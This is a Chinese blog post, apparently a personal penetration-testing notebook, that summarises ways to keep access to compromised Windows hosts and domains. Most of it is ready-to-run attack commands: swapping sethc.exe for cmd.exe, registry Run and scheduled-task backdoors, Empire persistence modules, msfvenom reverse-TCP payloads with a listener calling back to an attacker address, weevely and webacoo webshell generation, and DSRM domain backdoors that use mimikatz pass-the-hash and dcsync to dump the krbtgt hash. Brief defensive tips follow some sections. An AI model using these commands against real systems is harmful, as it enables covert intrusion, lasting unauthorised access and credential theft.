<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="权限维持小结, 每天都要努力哇">
    <meta name="description" content="分享者才是学习中最大的受益者！">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>权限维持小结 | 每天都要努力哇</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 5.4.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
<link rel="alternate" href="/atom.xml" title="每天都要努力哇" type="application/atom+xml">
</head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">每天都要努力哇</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">每天都要努力哇</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/Redamancy404/hexo-theme-matery" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/Redamancy404/hexo-theme-matery" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/2.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">权限维持小结</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E5%B0%8F%E7%BB%93/">
                                <span class="chip bg-color">权限维持小结</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/" class="post-category">
                                权限维持
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2021-10-28
                </div>
                

                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    3.6k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    13 分
                </div>
                

                
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="/libs/prism/prism.css">
        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="权限维持"><a href="#权限维持" class="headerlink" title="权限维持"></a>权限维持</h1><h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>当我们在渗透过程中通过漏洞获取到目标主机权限后，往往会因为服务器管理员发现和修补漏洞而导致对服务器权限的丢失，所以权限维持就显得很重要了。</p>
<h2 id="权限维持重要性"><a href="#权限维持重要性" class="headerlink" title="权限维持重要性"></a>权限维持重要性</h2><pre class="line-numbers language-none"><code class="language-none">1.渗透测试利用相关漏洞拿下目标站点

2.持续输出可以持久输出数据

3.获取信息利用webshell获取到需要的信息

4.权限维持对目标进行权限维持<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>



<h1 id="操作系统后门"><a href="#操作系统后门" class="headerlink" title="操作系统后门"></a>操作系统后门</h1><h2 id="粘滞键后门"><a href="#粘滞键后门" class="headerlink" title="粘滞键后门"></a>粘滞键后门</h2><h3 id="手上"><a href="#手上" class="headerlink" title="手上"></a>手上</h3><p>安全模式下</p>
<ul>
<li>工作组的命令框</li>
</ul>
<p>复制粘贴cmd.exe 然后就直接打开了</p>
<ul>
<li> 域用户的命令框</li>
</ul>
<p>把cmd复制一份改成粘滞键的名字</p>
<p>进入到登录页面 就可以创建域用户</p>
<p>进入系统</p>
<p>用可执行文件<code>sethc.exe.bak</code>替换<code>windows\systdm32</code>目录下的sethc.exe </p>
<pre class="line-numbers language-none"><code class="language-none">cd windows\system32
move sethc.exe sethc.exe.bak
copy cmd.exe sethc.exe 
#连续按5次shift键,将弹出命令行窗口。可以直接以system权限执行系统命令<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="Empire"><a href="#Empire" class="headerlink" title="Empire"></a>Empire</h3><p>前提得是*用户，过UAC,system权限才行</p>
<pre class="line-numbers language-csharp" data-language="csharp"><code class="language-csharp">usemodule lateral_movement<span class="token operator">/</span>invoke_wmi_debugger
info
<span class="token keyword">set</span> Listener dayu
<span class="token keyword">set</span> <span class="token return-type class-name">ComputerName</span> user1<span class="token punctuation">.</span>xiyou<span class="token punctuation">.</span>dayu<span class="token punctuation">.</span>com <span class="token punctuation">(</span>计算机名<span class="token punctuation">)</span>
<span class="token keyword">set</span> TargetBinary sethc<span class="token punctuation">.</span>exe
execute<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>执行完execute被攻击方电脑会一闪而过CMD终端窗口!<br>最后，在目标系统上连续按5次shift键触发后门:</p>
<h3 id="粘滞键后门防范措施"><a href="#粘滞键后门防范措施" class="headerlink" title="粘滞键后门防范措施"></a>粘滞键后门防范措施</h3><p>1.在远程登录服务器时，连续按5次“”Shift”键，判断服务器是否被人侵。<br>2.拒绝使用setch.exe或者在“控制面板”中关闭“启用粘滞键”选项</p>
<h2 id="注册表后门"><a href="#注册表后门" class="headerlink" title="注册表后门"></a>注册表后门</h2><h3 id="手上-1"><a href="#手上-1" class="headerlink" title="手上"></a>手上</h3><p>在普通用户权限下,攻击者会将需要执行的后门程序或者脚本路径填写到注册表键</p>
<pre class="line-numbers language-csharp" data-language="csharp"><code class="language-csharp">\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>Run:该项下的键值即为开机启动项,每-次随着开机而启动</p>
<p>运行输入：regedit.exe</p>
<h3 id="Empire-1"><a href="#Empire-1" class="headerlink" title="Empire"></a>Empire</h3><p>输入<code>usemodule persistence/userland/registry</code>命令模块 </p>
<p>运行后，会在目标主机的启动项里增加一个命令</p>
<pre class="line-numbers language-csharp" data-language="csharp"><code class="language-csharp">usemodule persistence<span class="token operator">/</span>userland<span class="token operator">/</span>registry
<span class="token keyword">set</span> Listener dayu
<span class="token keyword">set</span> <span class="token class-name">RegPath</span> HKCU<span class="token punctuation">:</span>Software\Microsoft\Windows\CurrentVersion\Run
execute<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>当管理员登陆系统时，后门就会运行，反弹成功!</p>
<p>注销或者重启后，后门就自动运行了</p>
<p>进入桌面自动闪过cmd命令框</p>
<p>kali就上线了！</p>
<h3 id="注册表后门防范措施"><a href="#注册表后门防范措施" class="headerlink" title="注册表后门防范措施"></a>注册表后门防范措施</h3><p>杀毒软件针对此类后门有专门的查杀机制，当发现系统中存在后门时会弹出提示框。根据提示内容， 采取相应的措施，即可删除此类后门</p>
<h2 id="计划任务后门"><a href="#计划任务后门" class="headerlink" title="计划任务后门"></a>计划任务后门</h2><h3 id="手上-2"><a href="#手上-2" class="headerlink" title="手上"></a>手上</h3><p>计划任务在Windows7及之前版本的操作系统中使用at命令调用，在从Windows8版本开始的操作系 统中使用<code>schtasks</code>命令调用。</p>
<p>计划任务后门分为<code>管理员权限</code>和<code>普通用户权限</code>两种。管理员权限的后门 可以设置更多的计划任务，例如重启后运行等。<br>计划任务后门的基本命令如下。该命令表示每小时执行一次notepad.exe</p>
<pre class="line-numbers language-csharp" data-language="csharp"><code class="language-csharp">schtasks <span class="token operator">/</span>Create <span class="token operator">/</span>tn Updater <span class="token operator">/</span>tr notepad<span class="token punctuation">.</span>exe <span class="token operator">/</span>sc MINUTE <span class="token operator">/</span>mo <span class="token number">1</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://gitee.com/work-hard-every-day/test/raw/master/img/202110282131116.png" alt="在这里插入图片描述"></p>
<p>删除话 这个命令就可以</p>
<pre class="line-numbers language-csharp" data-language="csharp"><code class="language-csharp">schtasks <span class="token operator">/</span>Delete <span class="token operator">/</span>tn Updater<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="MSF"><a href="#MSF" class="headerlink" title="MSF"></a>MSF</h3><p>使用Poweshell payload web delivery模块，可以模拟攻击者在目标系统中快速建立会话的行为。因 为该行为不会被写入磁盘，所以安全防护软件不会对该行为进行检测</p>
<pre class="line-numbers language-csharp" data-language="csharp"><code class="language-csharp">use exploit<span class="token operator">/</span>multi<span class="token operator">/</span>script<span class="token operator">/</span>web_delivery 
<span class="token keyword">set</span> target <span class="token number">2</span>
<span class="token keyword">set</span> payload windows<span class="token operator">/</span>meterpreter<span class="token operator">/</span>reverse_tcp
<span class="token keyword">set</span> lhost <span class="token number">192.168</span><span class="token number">.253</span><span class="token number">.9</span>
<span class="token keyword">set</span> lport <span class="token number">443</span>
<span class="token keyword">set</span> URIPATH <span class="token operator">/</span>
exploit<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="Empire-2"><a href="#Empire-2" class="headerlink" title="Empire"></a>Empire</h3><p>设置DailyTime和Listener参数，到了设置的时间，将执行sec计划，将返回一个高权限的shell：</p>
<pre class="line-numbers language-csharp" data-language="csharp"><code class="language-csharp">usemodule persistence<span class="token operator">/</span>elevated<span class="token operator">/</span>schtasks
<span class="token keyword">set</span> DailyTime <span class="token number">15</span><span class="token punctuation">:</span><span class="token number">36</span>
<span class="token keyword">set</span> Listener dayu
execute<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="计划任务后门防范措施"><a href="#计划任务后门防范措施" class="headerlink" title="计划任务后门防范措施"></a>计划任务后门防范措施</h3><p>有效的防范措施是:</p>
<ul>
<li>安装安全防护软件并对系统进行扫描 </li>
<li>及时为系统打补丁</li>
<li>在内网中使用强度较高的密码</li>
</ul>
<h2 id="MSF后门"><a href="#MSF后门" class="headerlink" title="MSF后门"></a>MSF后门</h2><ul>
<li>生成exe的马儿</li>
</ul>
<pre class="line-numbers language-csharp" data-language="csharp"><code class="language-csharp">msfvenom <span class="token operator">-</span>p windows<span class="token operator">/</span>meterpreter<span class="token operator">/</span><span class="token class-name">reverse_tcp</span> LHOST<span class="token operator">=</span><span class="token number">192.168</span><span class="token number">.253</span><span class="token number">.9</span> LPORT<span class="token operator">=</span><span class="token number">4444</span> <span class="token operator">-</span>f exe<span class="token operator">&gt;</span><span class="token number">1</span><span class="token punctuation">.</span>exe<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<ul>
<li>开启监听</li>
</ul>
<pre class="line-numbers language-csharp" data-language="csharp"><code class="language-csharp">msfconsole <span class="token operator">-</span>x <span class="token string">"use exploit/multi/handler; set payload windows/meterpreter/reverse_ tcp; set lhost 192.168.253.27; set lport 4444; exploit -j;"</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<ul>
<li>执行后门上线</li>
<li>查看帮助</li>
</ul>
<pre class="line-numbers language-csharp" data-language="csharp"><code class="language-csharp">run persistence <span class="token operator">-</span>h<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="https://gitee.com/work-hard-every-day/test/raw/master/img/202110282131118.png" alt="在这里插入图片描述"></p>
<ul>
<li>创建服务</li>
</ul>
<pre class="line-numbers language-csharp" data-language="csharp"><code class="language-csharp">run persistence <span class="token operator">-</span>S <span class="token operator">-</span>U <span class="token operator">-</span>X <span class="token operator">-</span>i <span class="token number">5</span> <span class="token operator">-</span>p <span class="token number">443</span> <span class="token operator">-</span>r IP<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>这里要注意的是</p>
<p>使用了-S 这个参数</p>
<p>需要（system）权限才能执行创建</p>
<p>不管关机 重启后都可以上线</p>
<h2 id="wmi型后门"><a href="#wmi型后门" class="headerlink" title="wmi型后门"></a>wmi型后门</h2><p>在 Empire 下使用Invoke-WMI 模块:</p>
<p>先进行搜索</p>
<pre class="line-numbers language-csharp" data-language="csharp"><code class="language-csharp">searchmodule wmi<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>是有多个模块的</p>
<pre class="line-numbers language-csharp" data-language="csharp"><code class="language-csharp">usemodule persistence<span class="token operator">/</span>elevated<span class="token operator">/</span>wmi
info
<span class="token keyword">set</span> DailyTime <span class="token number">16</span><span class="token punctuation">:</span><span class="token number">10</span>
<span class="token keyword">set</span> Listener dayu
run<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h2 id="检测后门"><a href="#检测后门" class="headerlink" title="检测后门"></a>检测后门</h2><p>在powershell下</p>
<pre class="line-numbers language-csharp" data-language="csharp"><code class="language-csharp">Get<span class="token operator">-</span>WmiObject <span class="token operator">-</span>Namespace root\Subscription <span class="token operator">-</span>Class CommandLineEventConsumer <span class="token operator">-</span>FILTER <span class="token string">"Name='Updater'"</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://gitee.com/work-hard-every-day/test/raw/master/img/202110282131119.png" alt="在这里插入图片描述"><br>这样就是没有的</p>
<h2 id="清除WMI后门得到方法"><a href="#清除WMI后门得到方法" class="headerlink" title="清除WMI后门得到方法"></a>清除WMI后门得到方法</h2><p>删除自动运行列表中的恶意WMI条目<br>在powershell中用<code>get-wmiobject</code>命令删除与WMI持久化的组件</p>
<h1 id="web后门"><a href="#web后门" class="headerlink" title="web后门"></a>web后门</h1><h2 id="weevely后门"><a href="#weevely后门" class="headerlink" title="weevely后门"></a>weevely后门</h2><h3 id="功能"><a href="#功能" class="headerlink" title="功能"></a>功能</h3><pre class="line-numbers language-csharp" data-language="csharp"><code class="language-csharp"><span class="token number">1</span><span class="token punctuation">.</span>执行命令和测览远程文件
<span class="token number">2</span><span class="token punctuation">.</span>检测常见的服务器配置问题
<span class="token number">3</span><span class="token punctuation">.</span>创建 TCP Shell 和 Reverse Shell
<span class="token number">4</span><span class="token punctuation">.</span>打扫描端口
<span class="token number">5</span><span class="token punctuation">.</span>安装HTTP代理<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="使用"><a href="#使用" class="headerlink" title="使用"></a>使用</h3><p>weevely <url> <password> [cmd] #连接一句话<br>weevely session <path> cmd #加载会话文件<br>weevely generate <password> <path> # 生成后门代理，一般用这个</path></password></path></password></url></p>
<h2 id="webacco后门"><a href="#webacco后门" class="headerlink" title="webacco后门"></a>webacco后门</h2><ul>
<li>安装</li>
</ul>
<pre class="line-numbers language-csharp" data-language="csharp"><code class="language-csharp">apt install webacoo<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<ul>
<li>生成shell</li>
</ul>
<pre class="line-numbers language-csharp" data-language="csharp"><code class="language-csharp">webacoo <span class="token operator">-</span>g <span class="token operator">-</span>o <span class="token number">123</span><span class="token punctuation">.</span>php<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<ul>
<li>连接后门</li>
</ul>
<p>webacoo -t -u <a target="_blank" rel="noopener" href="http://192.168.x.x/123.php">http://192.168.x.x/123.php</a></p>
<h1 id="域控制器权限持久化"><a href="#域控制器权限持久化" class="headerlink" title="域控制器权限持久化"></a>域控制器权限持久化</h1><h2 id="DSRM域后门"><a href="#DSRM域后门" class="headerlink" title="DSRM域后门"></a>DSRM域后门</h2><p>DSRM （ Directory Services Restore Mode,目录服务恢复模式）是Windows域环境中域控制器的安全模式启动选项。每个域控制器都有一个本地管理员账户（也就是DSRM账户）</p>
<p>DSRM的用途是:允许管理员在域环境中出现故障或崩溃时还原、修复、重建活动目录数据库，使域环境的运行恢复正常。在 域环境创建初期，DSRM的密码需要在安装DC时设置，且很少会被重置。修改DSRM密码最基本的方法是在DC上运行ntdsutiI命令行工具。<br>在渗透测试中，可以使用DSRM账号对域环境进行持久化操作。</p>
<ul>
<li>如果域控制器的系统版本为Windows Server 2008,需要安装<code>KB961320</code>才可以使用指定域账号的密码对DSRM的密码进行同步。</li>
<li>在 Windows Server 2008以后版本的系统中不需要安装此补丁。</li>
<li>如果域控制器的系统版本为Windows Server 2003则不能使用该方法进行持久化操作</li>
</ul>
<p>我们知道，每个域控制器都有本地管理员账号和密码（与城管理员账号和密码不同）DSRM账号可以 作为一个域控制器的本地管理品用户，通过网络连接城控制器，进而控制域控制器。</p>
<p><strong>简单来讲 就是当初创建域的时候：键入目录还原的(DSRM)密码</strong></p>
<h3 id="修改DSRM密码"><a href="#修改DSRM密码" class="headerlink" title="修改DSRM密码"></a>修改DSRM密码</h3><h3 id="第一种"><a href="#第一种" class="headerlink" title="第一种"></a>第一种</h3><p>在域控制器上打开命令行环境</p>
<pre class="line-numbers language-none"><code class="language-none">1. NTDSUTIL: 登录ntdsutil
2. set dsrm password #设置DSRM密码
3. reset password on server null #在当前域控服务器上恢复DSRM密码
4. &lt;PASSWORD&gt; # 修改后的密码
5. q # 退出密码设置模式
6. q # 退出NTDSUTIL模式<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>修改成功 用ipc登录尝试</p>
<p>这里是登录不上的  因为域控默认是禁用DSRM的</p>
<h3 id="第二种"><a href="#第二种" class="headerlink" title="第二种"></a>第二种</h3><p>简单来讲 就是用krbtgt用户的NTLM hash覆盖administrator用户的NTLM  hash</p>
<pre class="line-numbers language-csharp" data-language="csharp"><code class="language-csharp">ntdsutil
<span class="token keyword">set</span> dsrm password
sync <span class="token keyword">from</span> domain account krbtgt
q
q<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>可以进行查看是否成功</p>
<pre class="line-numbers language-none"><code class="language-none">lsadump::sam
lsadump::lsa /patch /name:krbtgt<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<h3 id="DSRM的三种登录方式"><a href="#DSRM的三种登录方式" class="headerlink" title="DSRM的三种登录方式"></a>DSRM的三种登录方式</h3><ul>
<li>0：默认值，只有当城控制器重启并进入DSRM模式时，才可以使用DSRM管理员账号。</li>
<li>1:只有当本地AD、DS服务停止时，才可以使用DSRM管理员账号登录域控制器。</li>
<li>2:在任何情况下，都可以使用DSRM管理员账号登录域控制器。</li>
</ul>
<p>如果要使用DSRM账号通过网络登录域控制器，需要将该值设置为2</p>
<p>powershell下执行</p>
<pre class="line-numbers language-csharp" data-language="csharp"><code class="language-csharp">New<span class="token operator">-</span>ItemProperty <span class="token string">"hklm:\system\currentcontrolset\control\lsa\" -name "</span>dsrmadminlog
onbehavior" <span class="token operator">-</span><span class="token keyword">value</span> <span class="token number">2</span> <span class="token operator">-</span>propertyType DWORD<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<h3 id="使用DSRM账号通过网络远程登录域控制器"><a href="#使用DSRM账号通过网络远程登录域控制器" class="headerlink" title="使用DSRM账号通过网络远程登录域控制器"></a>使用DSRM账号通过网络远程登录域控制器</h3><p>使用mimikatz进行哈希传递，在域成员机器的管理模式下打开mimikatz：</p>
<pre class="line-numbers language-csharp" data-language="csharp"><code class="language-csharp">mimikatz<span class="token punctuation">.</span>exe <span class="token string">"privilege::debug"</span> "sekurlsa<span class="token punctuation">::</span>pth <span class="token operator">/</span>user<span class="token punctuation">:</span>Administrator <span class="token operator">/</span>domain<span class="token punctuation">:</span>xxx <span class="token operator">/</span>ntlm<span class="token punctuation">:</span>xxx<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h3 id="使用Mimikatz的scysnc功能远程转储krbtgt的NTML-Hash"><a href="#使用Mimikatz的scysnc功能远程转储krbtgt的NTML-Hash" class="headerlink" title="使用Mimikatz的scysnc功能远程转储krbtgt的NTML Hash"></a>使用Mimikatz的scysnc功能远程转储krbtgt的NTML Hash</h3><p>哈希传递攻击完成后</p>
<p>弹出命令窗口 在该窗口下打开mimikatz</p>
<pre class="line-numbers language-csharp" data-language="csharp"><code class="language-csharp">lsadump<span class="token punctuation">::</span>dcsync <span class="token operator">/</span>domain<span class="token punctuation">:</span>xiyou<span class="token punctuation">.</span>dayu<span class="token punctuation">.</span>com <span class="token operator">/</span>dc<span class="token punctuation">:</span>dc <span class="token operator">/</span>user<span class="token punctuation">:</span>krbtgt<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h3 id="DSRM域后门防御措施"><a href="#DSRM域后门防御措施" class="headerlink" title="DSRM域后门防御措施"></a>DSRM域后门防御措施</h3><ul>
<li>定期检查注册表中用于控制DSRM登录方式的键值<code>hklm:\system\currentcontrolset\control\lsa\</code>确认该键值为1,或者删除该键值</li>
<li>定期修改城中所有城控制器的DSRM账号。</li>
<li>经常检查ID为4794的日志。当试设置活动目录服务还原模式的管理员密码会被记录在4794日志中。</li>
</ul>
